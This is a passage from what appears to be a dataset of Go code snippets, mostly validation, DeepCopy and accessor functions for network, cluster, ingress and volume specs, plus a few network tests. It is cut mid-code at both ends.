errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (in *ValidationSpec) DeepCopy() *ValidationSpec {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(ValidationSpec)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func (o *IpamNetworkDataData) SetNetworkIsValid(v string) {\n\to.NetworkIsValid = &v\n}", "func (m *PortNetworkPolicy) Validate() error {\n\treturn m.validate(false)\n}", "func (o *GetNetworkSharesOKBody) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := o.validateNetworkshareDetails(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *containerNetworkManager) VerifyNetworkOptions(_ context.Context) error {\n\t// TODO: check host OS, not client-side OS.\n\tif runtime.GOOS != \"linux\" {\n\t\treturn errors.New(\"container networking mode is currently only supported on Linux\")\n\t}\n\n\tif m.netOpts.NetworkSlice != nil && len(m.netOpts.NetworkSlice) > 1 {\n\t\treturn errors.New(\"conflicting options: only one network specification is allowed when using '--network=container:<container>'\")\n\t}\n\n\tnonZeroParams := nonZeroMapValues(map[string]interface{}{\n\t\t\"--hostname\": m.netOpts.Hostname,\n\t\t\"--mac-address\": m.netOpts.MACAddress,\n\t\t// NOTE: an empty slice still counts as a non-zero value so we check its length:\n\t\t\"-p/--publish\": len(m.netOpts.PortMappings) != 0,\n\t\t\"--dns\": len(m.netOpts.DNSServers) != 0,\n\t\t\"--add-host\": len(m.netOpts.AddHost) != 0,\n\t})\n\n\tif len(nonZeroParams) != 0 {\n\t\treturn fmt.Errorf(\"conflicting options: the following arguments are not supported when using `--network=container:<container>`: %s\", nonZeroParams)\n\t}\n\n\treturn nil\n}", "func (m *NetworkPolicy) Validate() error {\n\treturn m.validate(false)\n}", "func (m *WireguardSpec) Validate(formats strfmt.Registry) error {\n\treturn nil\n}", "func (in *VMNetworkSpec) DeepCopy() *VMNetworkSpec {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(VMNetworkSpec)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func (spec Spec) Validate() error {\n\tif !validModule.MatchString(spec.Module) {\n\t\treturn fmt.Errorf(\"invalid module: %q\", spec.Module)\n\t}\n\tif !validVersion.MatchString(spec.Version) {\n\t\treturn fmt.Errorf(\"invalid version: %q\", spec.Version)\n\t}\n\tif !validType.MatchString(spec.Type) {\n\t\treturn fmt.Errorf(\"invalid type: %q\", spec.Type)\n\t}\n\tif !validClass.MatchString(spec.Class) {\n\t\treturn fmt.Errorf(\"invalid class: %q\", spec.Class)\n\t}\n\treturn nil\n}", "func validateExternalNetwork(p *openstack.Platform, ci *CloudInfo, fldPath *field.Path) (allErrs field.ErrorList) {\n\t// Return an error if external network was specified in the install config, but hasn't been found\n\tif p.ExternalNetwork != \"\" && ci.ExternalNetwork == nil {\n\t\tallErrs = append(allErrs, field.NotFound(fldPath.Child(\"externalNetwork\"), p.ExternalNetwork))\n\t}\n\treturn allErrs\n}", "func (eth *Backend) ValidateContract(contractData []byte) error {\n\tver, _, err := dexeth.DecodeContractData(contractData)\n\tif err != nil { // ensures secretHash is proper length\n\t\treturn err\n\t}\n\tif ver != version {\n\t\treturn fmt.Errorf(\"incorrect contract version %d, wanted %d\", ver, version)\n\t}\n\treturn nil\n}", "func (m *CloudInitNetWorkRoute) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateGateway(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateNetmask(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateNetwork(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func ValidateClusterSpec(resolver ResolverInterface, spec *cmd.ClusterSpec, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\tif spec == nil {\n\t\treturn allErrs\n\t}\n\n\t// Virtual IP is specified.\n\tif spec.VirtualIP != \"\" {\n\t\tipaddr := net.ParseIP(spec.VirtualIP)\n\t\tif ipaddr == nil {\n\t\t\tallErrs = append(allErrs, field.Invalid(fldPath.Child(\"virtualIP\"), spec.VirtualIP, \"virtual IP is invalid\"))\n\t\t} else if !ipaddr.IsGlobalUnicast() {\n\t\t\tallErrs = append(allErrs, field.Invalid(fldPath.Child(\"virtualIP\"), spec.VirtualIP, \"virtual IP is not global unicast address\"))\n\t\t}\n\t}\n\n\t// Validate specified quorum nodes.\n\tallErrs = append(allErrs, ValidateClusterSpecQuorumNodes(resolver, spec.QuorumNodes, fldPath.Child(\"quorumNodes\"))...)\n\n\t// Validate NTP config\n\tallErrs = append(allErrs, ValidateClusterSpecNTPServers(resolver, spec.NTPServers, fldPath.Child(\"ntpServers\"))...)\n\n\treturn allErrs\n}", "func (in *NetworkLinkSpec) DeepCopy() *NetworkLinkSpec {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(NetworkLinkSpec)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func (ip *IPAddrSpec) Validate() error {\n\tif len(ip.List) != 0 && (ip.Range[0] != nil || ip.Range[1] != nil) {\n\t\treturn fmt.Errorf(\"either List or Range but not both can be specified\")\n\t}\n\tif len(ip.List) == 0 && (ip.Range[0] == nil || ip.Range[1] == nil) {\n\t\treturn fmt.Errorf(\"neither List nor Range is specified\")\n\t}\n\tif len(ip.List) != 0 {\n\t\tfor i := 0; i < len(ip.List); i++ {\n\t\t\tif err := ip.List[i].Validate(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\tif ip.Range[0] != nil && ip.Range[1] != nil {\n\t\tfor i := 0; i < len(ip.Range); i++ {\n\t\t\tif err := ip.Range[i].Validate(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}", "func (o *IpamNetworkDataData) GetNetworkIsValidOk() (*string, bool) {\n\tif o == nil || o.NetworkIsValid == nil {\n\t\treturn nil, false\n\t}\n\treturn o.NetworkIsValid, true\n}", "func (o *PodnetOptions) Validate() error {\n\t/*\n\t\tif len(o.rawConfig.CurrentContext) == 0 {\n\t\t\treturn errNoContext\n\t\t}\n\t\tif len(o.args) > 1 {\n\t\t\treturn fmt.Errorf(\"either one or no arguments are allowed\")\n\t\t}\n\t*/\n\n\tif o.outputFormat != \"\" {\n\t\to.outputFormat = strings.ToLower(o.outputFormat)\n\n\t\tswitch o.outputFormat {\n\t\tcase \"json\", \"text\": // valid format\n\t\tdefault: // illegal format\n\t\t\treturn fmt.Errorf(\"unknown output format %s\", o.outputFormat)\n\t\t}\n\t}\n\n\treturn nil\n}", "func ValidateIngressSpec(spec *extensions.IngressSpec, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\t// TODO: Is a default backend mandatory?\n\tif spec.Backend != nil {\n\t\tallErrs = append(allErrs, validateIngressBackend(spec.Backend, fldPath.Child(\"backend\"))...)\n\t} else if len(spec.Rules) == 0 {\n\t\tallErrs = append(allErrs, field.Invalid(fldPath, spec.Rules, \"either `backend` or `rules` must be specified\"))\n\t}\n\tif len(spec.Rules) > 0 {\n\t\tallErrs = append(allErrs, validateIngressRules(spec.Rules, fldPath.Child(\"rules\"))...)\n\t}\n\tif len(spec.TLS) > 0 {\n\t\tallErrs = append(allErrs, validateIngressTLS(spec, fldPath.Child(\"tls\"))...)\n\t}\n\treturn allErrs\n}", "func (o *IpamNetworkDataData) GetNetworkIsValid() string {\n\tif o == nil || o.NetworkIsValid == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.NetworkIsValid\n}", "func (w *WithdrawalNetwork) Valid() bool {\n\tswitch *w {\n\tcase \"local\", \"remote\":\n\t\treturn true\n\tdefault:\n\t\treturn false\n\t}\n}", "func (m *PortNetworkPolicyRule) Validate() error {\n\treturn m.validate(false)\n}", "func (m *hostNetworkManager) VerifyNetworkOptions(_ context.Context) error {\n\t// TODO: check host OS, not client-side OS.\n\tif runtime.GOOS == \"windows\" {\n\t\treturn errors.New(\"cannot use host networking on Windows\")\n\t}\n\n\tif m.netOpts.MACAddress != \"\" {\n\t\treturn errors.New(\"conflicting options: mac-address and the network mode\")\n\t}\n\n\treturn validateUtsSettings(m.netOpts)\n}", "func ValidateName(name string, netType string) error {\n\tdriverFunc, ok := drivers[netType]\n\tif !ok {\n\t\treturn ErrUnknownDriver\n\t}\n\n\tn := driverFunc()\n\tn.init(nil, 0, name, netType, \"\", nil, \"Unknown\")\n\n\terr := n.ValidateName(name)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"Network name invalid\")\n\t}\n\n\treturn nil\n}", "func (o *BaseEdgeLBPoolSpec) ValidateTransition(previous *BaseEdgeLBPoolSpec) error {\n\t// If we're transitioning to a cloud-provider configuration, we don't need to perform any additional validations, as a new EdgeLB pool will always be created.\n\tif *previous.CloudProviderConfiguration == \"\" && *o.CloudProviderConfiguration != \"\" {\n\t\treturn nil\n\t}\n\t// Prevent the cloud-provider configuration from being removed.\n\tif *previous.CloudProviderConfiguration != \"\" && *o.CloudProviderConfiguration == \"\" {\n\t\treturn fmt.Errorf(\"the cloud-provider configuration cannot be removed\")\n\t}\n\t// Prevent the name of the EdgeLB pool from changing.\n\tif *previous.Name != *o.Name {\n\t\treturn errors.New(\"the name of the target edgelb pool cannot be changed\")\n\t}\n\t// Prevent the role of the EdgeLB pool from changing.\n\tif *previous.Role != *o.Role {\n\t\treturn errors.New(\"the role of the target edgelb pool cannot be changed\")\n\t}\n\t// Prevent the virtual network of the target EdgeLB pool from changing.\n\tif *previous.Network != *o.Network {\n\t\treturn errors.New(\"the virtual network of the target edgelb pool cannot be changed\")\n\t}\n\treturn nil\n}", "func (ctl *Ctl) SpecIsValid() (bool, error) {\n\treturn true, nil\n}", "func (ctl *Ctl) SpecIsValid() (bool, error) {\n\treturn true, nil\n}", "func validNetworks(nets []string) bool {\n\tfor _, net := range nets {\n\t\tif strings.Count(net, \"[\") != strings.Count(net, \"]\") {\n\t\t\t// unbalanced groups.\n\t\t\treturn false\n\t\t}\n\n\t\tnet = strings.TrimPrefix(net, \"!\")\n\t\t// If this network is a grouping, check the inner group.\n\t\tif strings.HasPrefix(net, \"[\") || strings.Contains(net, \",\") {\n\t\t\tif validNetworks(strings.Split(strings.Trim(net, \"[]\"), \",\")) {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\treturn false\n\t\t}\n\t\tswitch {\n\t\tcase net == \"any\":\n\t\t\tcontinue\n\t\tcase strings.HasPrefix(net, \"$\"):\n\t\t\tcontinue\n\t\tcase !validNetwork(net):\n\t\t\treturn false\n\t\t}\n\t}\n\treturn true\n}", "func (m *PVMInstanceV2NetworkPort) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateIPProtocol(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateType(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *MetaDataNetworkBridgesConfig) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateGateway4(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateGateway6(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateNameservers(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateRoutes(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func ValidateCIDR(attribute string, network string) error {\n\n\tif _, _, err := net.ParseCIDR(network); err == nil {\n\t\treturn nil\n\t}\n\n\treturn makeValidationError(attribute, fmt.Sprintf(\"Attribute '%s' must be a CIDR\", attribute))\n}", "func ValidateHostNetworking(testType TestType, podValidationInputString string, nodeName string, f *framework.Framework) {\n\ttesterArgs := []string{fmt.Sprintf(\"-pod-networking-validation-input=%s\",\n\t\tpodValidationInputString)}\n\n\tvar shouldTestPodError bool\n\tif NetworkingSetupSucceeds == testType {\n\t\ttesterArgs = append(testerArgs, \"-test-setup=true\")\n\t} else if NetworkingSetupFails == testType {\n\t\ttesterArgs = append(testerArgs, \"-test-setup=true\")\n\t\tshouldTestPodError = true\n\t} else if NetworkingTearDownSucceeds == testType {\n\t\ttesterArgs = append(testerArgs, \"-test-cleanup=true\")\n\t} else if NetworkingTearDownFails == testType {\n\t\ttesterArgs = append(testerArgs, \"-test-cleanup=true\")\n\t\tshouldTestPodError = true\n\t}\n\n\ttestContainer := manifest.NewTestHelperContainer(f.Options.TestImageRegistry).\n\t\tCommand([]string{\"./networking\"}).\n\t\tArgs(testerArgs).\n\t\tBuild()\n\n\ttestPod := manifest.NewDefaultPodBuilder().\n\t\tContainer(testContainer).\n\t\tNodeName(nodeName).\n\t\tHostNetwork(true).\n\t\tBuild()\n\n\tBy(\"creating pod to test host networking setup\")\n\ttestPod, err := f.K8sResourceManagers.PodManager().\n\t\tCreateAndWaitTillPodCompleted(testPod)\n\tlogs, errLogs := f.K8sResourceManagers.PodManager().\n\t\tPodLogs(testPod.Namespace, testPod.Name)\n\tExpect(errLogs).ToNot(HaveOccurred())\n\n\tfmt.Fprintln(GinkgoWriter, logs)\n\n\tif shouldTestPodError {\n\t\tExpect(err).To(HaveOccurred())\n\t} else {\n\t\tExpect(err).ToNot(HaveOccurred())\n\t}\n\n\tBy(\"deleting the host networking setup pod\")\n\terr = f.K8sResourceManagers.PodManager().\n\t\tDeleteAndWaitTillPodDeleted(testPod)\n\tExpect(err).ToNot(HaveOccurred())\n}", "func (m *GitConnectionTest) Validate(formats strfmt.Registry) error {\n\treturn nil\n}", "func TestNetworkAddDelete(t *testing.T) {\n\t// Basic vlan network\n\tcheckCreateNetwork(t, false, \"default\", \"contiv\", \"vlan\", \"10.1.1.1/24\", \"10.1.1.254\", 1)\n\tverifyNetworkState(t, \"default\", \"contiv\", \"vlan\", \"10.1.1.1\", \"10.1.1.254\", 24, 1, 0)\n\tcheckDeleteNetwork(t, false, \"default\", \"contiv\")\n\n\t// Basic Vxlan network\n\tcheckCreateNetwork(t, false, \"default\", \"contiv\", \"vxlan\", \"10.1.1.1/16\", \"10.1.1.254\", 1)\n\tverifyNetworkState(t, \"default\", \"contiv\", \"vxlan\", \"10.1.1.1\", \"10.1.1.254\", 16, 1, 1)\n\tcheckDeleteNetwork(t, false, \"default\", \"contiv\")\n\n\t// Basic IP range network checks\n\tcheckCreateNetwork(t, false, \"default\", \"contiv\", \"vxlan\", \"10.1.1.10-20/24\", \"10.1.1.254\", 1)\n\tverifyNetworkState(t, \"default\", \"contiv\", \"vxlan\", \"10.1.1.10\", \"10.1.1.254\", 24, 1, 1)\n\tcheckDeleteNetwork(t, false, \"default\", \"contiv\")\n\n\t// Try network create with invalid network range\n\tcheckCreateNetwork(t, true, \"default\", \"contiv\", \"vxlan\", \"10.1.1.1-70/26\", \"10.1.1.63\", 1)\n\n\t// Try network create with invalid subnet length\n\tcheckCreateNetwork(t, true, \"default\", \"contiv\", \"vxlan\", \"10.1.1.1/32\", \"10.1.1.1\", 1)\n\n\t// try creating network without tenant\n\tcheckCreateNetwork(t, true, \"tenant1\", \"contiv\", \"vxlan\", \"10.1.1.1/24\", \"10.1.1.254\", 1)\n\n\t// try invalid encap\n\tcheckCreateNetwork(t, true, \"default\", \"contiv\", \"vvvv\", \"10.1.1.1/24\", \"10.1.1.254\", 1)\n\n\t// try invalid pkt tags\n\tcheckCreateNetwork(t, true, \"default\", \"contiv\", \"vlan\", \"10.1.1.1/24\", \"10.1.1.254\", 5000)\n\tcheckCreateNetwork(t, true, \"default\", \"contiv\", \"vxlan\", \"10.1.1.1/24\", \"10.1.1.254\", 20000)\n\n\t// Try gateway outside the network\n\tcheckCreateNetwork(t, true, \"default\", \"contiv\", \"vxlan\", \"10.1.1.1/24\", \"10.1.2.254\", 1)\n\tcheckCreateNetwork(t, true, \"default\", \"contiv\", \"vxlan\", \"10.1.1.65-70/26\", \"10.1.1.1\", 2)\n\n\t// Try deleting a non-existing network\n\tcheckDeleteNetwork(t, true, \"default\", \"contiv\")\n}", "func (o *V1WorkloadSpec) HasNetworkInterfaces() bool {\n\tif o != nil && o.NetworkInterfaces != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (network *VirtualNetwork) GetSpec() genruntime.ConvertibleSpec {\n\treturn &network.Spec\n}", "func (m *TestSpecification) Validate() error {\n\tif m == nil {\n\t\treturn nil\n\t}\n\n\tswitch m.Config.(type) {\n\n\tcase *TestSpecification_Abort:\n\n\t\tif v, ok := interface{}(m.GetAbort()).(interface{ Validate() error }); ok {\n\t\t\tif err := v.Validate(); err != nil {\n\t\t\t\treturn TestSpecificationValidationError{\n\t\t\t\t\tfield: \"Abort\",\n\t\t\t\t\treason: \"embedded message failed validation\",\n\t\t\t\t\tcause: err,\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\tcase *TestSpecification_Latency:\n\n\t\tif v, ok := interface{}(m.GetLatency()).(interface{ Validate() error }); ok {\n\t\t\tif err := v.Validate(); err != nil {\n\t\t\t\treturn TestSpecificationValidationError{\n\t\t\t\t\tfield: \"Latency\",\n\t\t\t\t\treason: \"embedded message failed validation\",\n\t\t\t\t\tcause: err,\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t}\n\n\treturn nil\n}", "func ValidateClusterSpec(spec *kubermaticv1.ClusterSpec, dc *kubermaticv1.Datacenter, enabledFeatures features.FeatureGate, versionManager *version.Manager, currentVersion *semver.Semver, parentFieldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tif spec.HumanReadableName == \"\" {\n\t\tallErrs = append(allErrs, field.Required(parentFieldPath.Child(\"humanReadableName\"), \"no name specified\"))\n\t}\n\n\tif err := ValidateVersion(spec, versionManager, currentVersion, parentFieldPath.Child(\"version\")); err != nil {\n\t\tallErrs = append(allErrs, err)\n\t}\n\n\t// Validate if container runtime is valid for this cluster (in particular this checks for docker support).\n\tif err := ValidateContainerRuntime(spec); err != nil {\n\t\tallErrs = append(allErrs, field.Invalid(parentFieldPath.Child(\"containerRuntime\"), spec.ContainerRuntime, fmt.Sprintf(\"failed to validate container runtime: %s\", err)))\n\t}\n\n\tif !kubermaticv1.AllExposeStrategies.Has(spec.ExposeStrategy) {\n\t\tallErrs = append(allErrs, field.NotSupported(parentFieldPath.Child(\"exposeStrategy\"), spec.ExposeStrategy, kubermaticv1.AllExposeStrategies.Items()))\n\t}\n\n\t// Validate APIServerAllowedIPRanges for LoadBalancer expose strategy\n\tif spec.ExposeStrategy != kubermaticv1.ExposeStrategyLoadBalancer && spec.APIServerAllowedIPRanges != nil && len(spec.APIServerAllowedIPRanges.CIDRBlocks) > 0 {\n\t\tallErrs = append(allErrs, field.Forbidden(parentFieldPath.Child(\"APIServerAllowedIPRanges\"), \"Access control for API server is supported only for LoadBalancer expose strategy\"))\n\t}\n\n\t// Validate TunnelingAgentIP for Tunneling Expose strategy\n\tif spec.ExposeStrategy != kubermaticv1.ExposeStrategyTunneling && spec.ClusterNetwork.TunnelingAgentIP != \"\" {\n\t\tallErrs = append(allErrs, field.Forbidden(parentFieldPath.Child(\"TunnelingAgentIP\"), \"Tunneling agent IP can be configured only for Tunneling Expose strategy\"))\n\t}\n\n\t// External CCM is not supported for all providers and all Kubernetes versions.\n\tif spec.Features[kubermaticv1.ClusterFeatureExternalCloudProvider] {\n\t\tif !resources.ExternalCloudControllerFeatureSupported(dc, &spec.Cloud, spec.Version, versionManager.GetIncompatibilities()...) {\n\t\t\tallErrs = append(allErrs, field.Invalid(parentFieldPath.Child(\"features\").Key(kubermaticv1.ClusterFeatureExternalCloudProvider), true, \"external cloud-controller-manager is not supported for this cluster / provider combination\"))\n\t\t}\n\t}\n\n\tif spec.CNIPlugin != nil {\n\t\tif !cni.GetSupportedCNIPlugins().Has(spec.CNIPlugin.Type.String()) {\n\t\t\tallErrs = append(allErrs, field.NotSupported(parentFieldPath.Child(\"cniPlugin\", \"type\"), spec.CNIPlugin.Type.String(), sets.List(cni.GetSupportedCNIPlugins())))\n\t\t} else if versions, err := cni.GetAllowedCNIPluginVersions(spec.CNIPlugin.Type); err != nil || !versions.Has(spec.CNIPlugin.Version) {\n\t\t\tallErrs = append(allErrs, field.NotSupported(parentFieldPath.Child(\"cniPlugin\", \"version\"), spec.CNIPlugin.Version, sets.List(versions)))\n\t\t}\n\n\t\t// Dual-stack is not supported on Canal < v3.22\n\t\tif spec.ClusterNetwork.IPFamily == kubermaticv1.IPFamilyDualStack && spec.CNIPlugin.Type == kubermaticv1.CNIPluginTypeCanal {\n\t\t\tgte322Constraint, _ := semverlib.NewConstraint(\">= 3.22\")\n\t\t\tcniVer, _ := semverlib.NewVersion(spec.CNIPlugin.Version)\n\t\t\tif cniVer != nil && !gte322Constraint.Check(cniVer) {\n\t\t\t\tallErrs = append(allErrs, field.Forbidden(parentFieldPath.Child(\"cniPlugin\"), \"dual-stack not allowed on Canal CNI version lower than 3.22\"))\n\t\t\t}\n\t\t}\n\t}\n\n\tallErrs = append(allErrs, ValidateLeaderElectionSettings(&spec.ComponentsOverride.ControllerManager.LeaderElectionSettings, parentFieldPath.Child(\"componentsOverride\", \"controllerManager\", \"leaderElection\"))...)\n\tallErrs = append(allErrs, ValidateLeaderElectionSettings(&spec.ComponentsOverride.Scheduler.LeaderElectionSettings, parentFieldPath.Child(\"componentsOverride\", \"scheduler\", \"leaderElection\"))...)\n\n\texternalCCM := false\n\tif val, ok := spec.Features[kubermaticv1.ClusterFeatureExternalCloudProvider]; ok {\n\t\texternalCCM = val\n\t}\n\n\t// general cloud spec logic\n\tif errs := ValidateCloudSpec(spec.Cloud, dc, spec.ClusterNetwork.IPFamily, parentFieldPath.Child(\"cloud\"), externalCCM); len(errs) > 0 {\n\t\tallErrs = append(allErrs, errs...)\n\t}\n\n\tif errs := validateMachineNetworksFromClusterSpec(spec, parentFieldPath); len(errs) > 0 {\n\t\tallErrs = append(allErrs, errs...)\n\t}\n\n\tif errs := ValidateClusterNetworkConfig(&spec.ClusterNetwork, dc, spec.CNIPlugin, parentFieldPath.Child(\"networkConfig\")); len(errs) > 0 {\n\t\tallErrs = append(allErrs, errs...)\n\t}\n\n\tportRangeFld := field.NewPath(\"componentsOverride\", \"apiserver\", \"nodePortRange\")\n\tif err := ValidateNodePortRange(spec.ComponentsOverride.Apiserver.NodePortRange, portRangeFld); err != nil {\n\t\tallErrs = append(allErrs, err)\n\t}\n\n\tif errs := validateEncryptionConfiguration(spec, parentFieldPath.Child(\"encryptionConfiguration\")); len(errs) > 0 {\n\t\tallErrs = append(allErrs, errs...)\n\t}\n\n\treturn allErrs\n}", "func (o *IpamNetworkDataData) HasNetworkIsValid() bool {\n\tif o != nil && o.NetworkIsValid != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m *HttpNetworkPolicyRule) Validate() error {\n\treturn m.validate(false)\n}", "func (m *PVMInstanceNetwork) ContextValidate(ctx context.Context, formats strfmt.Registry) error {\n\treturn nil\n}", "func (p Peer) Validate() error {\n\treturn validation.ValidateStruct(\n\t\t&p,\n\t\tvalidation.Field(&p.NodeID, validation.Required),\n\t\tvalidation.Field(&p.Address, validation.Required, is.Host),\n\t)\n}", "func (m *IoK8sAPINetworkingV1IngressSpec) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateDefaultBackend(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateRules(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateTLS(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *KafkaNetworkPolicyRule) Validate() error {\n\treturn m.validate(false)\n}", "func (n *Network) ValidateNodes() field.ErrorList {\n\tvar allErrors field.ErrorList\n\n\tfor i := range n.Spec.Nodes {\n\t\tpath := field.NewPath(\"spec\").Child(\"nodes\").Index(i)\n\t\tnode := Node{\n\t\t\tSpec: n.Spec.Nodes[i].NodeSpec,\n\t\t}\n\t\t// No need to pass network and availability config\n\t\t// it has already been passed during network defaulting phase\n\t\t// no need to validate network config\n\t\tallErrors = append(allErrors, node.Validate(path, false)...)\n\t}\n\n\tif err := n.ValidateMissingBootnodes(); err != nil {\n\t\tallErrors = append(allErrors, err)\n\t}\n\n\treturn allErrors\n}", "func NewNetwork(dockerClient *client.Client, cfg NetworkConfig) (out *Network, err error) {\n\tscopes.Framework.Infof(\"Creating Docker network %s\", cfg.Name)\n\tresp, err := dockerClient.NetworkCreate(context.Background(), cfg.Name, types.NetworkCreate{\n\t\tCheckDuplicate: true,\n\t\tLabels: cfg.Labels,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tscopes.Framework.Infof(\"Docker network %s created (ID=%s)\", cfg.Name, resp.ID)\n\n\tn := &Network{\n\t\tNetworkConfig: cfg,\n\t\tdockerClient: dockerClient,\n\t\tid: resp.ID,\n\t}\n\tdefer func() {\n\t\tif err != nil {\n\t\t\t_ = n.Close()\n\t\t}\n\t}()\n\n\t// Retrieve the subnet for the network.\n\tiresp, err := dockerClient.NetworkInspect(context.Background(), resp.ID, types.NetworkInspectOptions{})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif _, n.Subnet, err = net.ParseCIDR(iresp.IPAM.Config[0].Subnet); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn n, nil\n}", "func (in *NetworkingSpec) DeepCopy() *NetworkingSpec {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(NetworkingSpec)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func (m *NetflowBandwidth) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func ValidateNetworkGroupID(input interface{}, key string) (warnings []string, errors []error) {\n\tv, ok := input.(string)\n\tif !ok {\n\t\terrors = append(errors, fmt.Errorf(\"expected %q to be a string\", key))\n\t\treturn\n\t}\n\n\tif _, err := ParseNetworkGroupID(v); err != nil {\n\t\terrors = append(errors, err)\n\t}\n\n\treturn\n}", "func IsValidDatastoreSpec(valiFn models.DatastoreSpecValidator) survey.Validator {\n\treturn func(val interface{}) error {\n\t\tif str, ok := val.(string); ok {\n\t\t\tif err := valiFn(models.ResourceSpec{\n\t\t\t\tName: str,\n\t\t\t}); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t} else {\n\t\t\t// otherwise we cannot convert the value into a string and cannot find a resource name\n\t\t\treturn fmt.Errorf(\"invalid type of resource name %v\", reflect.TypeOf(val).Name())\n\t\t}\n\t\t// the input is fine\n\t\treturn nil\n\t}\n}", "func ValidateVolumeSpec(volspec *api.VolumeSpecUpdate) error {\n\t// case of checking possible halevel flag combination\n\tif volspec.GetHaLevel() > 0 {\n\t\tif volspec.GetSize() > 0 || volspec.GetShared() || volspec.GetSticky() {\n\t\t\t// Please have unique msgs for each case so it's easy for use to identity the\n\t\t\t// flags mismatch combination.\n\t\t\treturn fmt.Errorf(\"Invalid halevel flag combination. Size, Shared or Sticky flag not supported \" +\n\t\t\t\t\"with halevel flag\")\n\t\t}\n\t}\n\treturn nil\n}", "func ValidateNetworkStatusUpdate(newStatus, oldStatus extensionsv1alpha1.NetworkStatus) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\treturn allErrs\n}", "func (cfg Config) Validate() error {\n\treturn validation.ValidateStruct(\n\t\t&cfg,\n\t\tvalidation.Field(&cfg.NodeID, validation.Required),\n\t\tvalidation.Field(&cfg.ListenAddr, validation.Required, is.Host),\n\t\tvalidation.Field(&cfg.DataDir, validation.Required),\n\t\tvalidation.Field(&cfg.CompactionEnabled, validation.Required),\n\t\tvalidation.Field(&cfg.Peers),\n\t)\n}", "func (m *VMProfileSpec) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateName(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validatePolicies(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *InterfaceProtocolConfigEth) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateMacAddress(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func ParseNetwork(network string) (minIp uint32, maxIp uint32, err error) {\n\tip, subnet, err := net.ParseCIDR(network)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tif ip = ip.To4(); ip == nil || ip[3] == 0 {\n\t\terr = fmt.Errorf(\"invalid network %s\", network)\n\t\treturn\n\t}\n\n\tminIp = Ipv4ToInt(subnet.IP) + 1\n\tmaxIp = minIp + ^Ipv4ToInt(net.IP(subnet.Mask)) - 1\n\n\treturn\n}", "func TestNetworkCreateDelete(t *testing.T) {\n\t// create netagent\n\tag, _, _ := createNetAgent(t)\n\tAssert(t, ag != nil, \"Failed to create agent %#v\", ag)\n\tdefer ag.Stop()\n\n\t// network message\n\tnt := netproto.Network{\n\t\tTypeMeta: api.TypeMeta{Kind: \"Network\"},\n\t\tObjectMeta: api.ObjectMeta{\n\t\t\tTenant: 